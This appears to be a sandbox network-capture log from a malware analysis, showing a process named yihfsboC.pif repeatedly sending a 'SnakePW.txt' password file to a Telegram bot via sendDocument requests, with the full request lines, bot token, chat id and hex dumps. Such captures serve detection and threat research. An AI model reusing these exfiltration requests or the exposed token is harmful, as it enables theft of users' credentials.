                                                                                                                2024-11-26 07:26:01 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 36 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388930,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605961,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                48192.168.2.749899149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:00 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f7f6e69a05f
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:00 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 37 66 36 65 36 39 61 30 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0f7f6e69a05fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:01 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:01 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:01 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 36 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388932,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605961,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                49192.168.2.749904149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:02 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f1ddc04ff5a
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:02 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 31 64 64 63 30 34 66 66 35 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0f1ddc04ff5aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:03 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:03 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:03 UTC523INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 36 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388935,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605963,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                50192.168.2.749905149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:02 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f982ba92d5d
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:02 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 39 38 32 62 61 39 32 64 35 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0f982ba92d5dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:03 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:03 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:03 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 36 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388936,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605963,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                51192.168.2.749906149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:02 UTC358OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f0c03271772
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-26 07:26:02 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 30 63 30 33 32 37 31 37 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0f0c03271772Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:03 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:03 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:03 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 36 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388938,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605963,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                52192.168.2.749914149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:04 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f1e9f0c802f
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:04 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 31 65 39 66 30 63 38 30 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0f1e9f0c802fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:05 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:05 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 524
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:05 UTC524INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 36 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388941,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605965,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                53192.168.2.749913149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:04 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0fab9e050937
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:04 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 61 62 39 65 30 35 30 39 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0fab9e050937Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:05 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:05 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:05 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 36 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388942,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605965,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                54192.168.2.749912149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:04 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f2f0420657e
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:04 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 32 66 30 34 32 30 36 35 37 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0f2f0420657eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:05 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:05 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
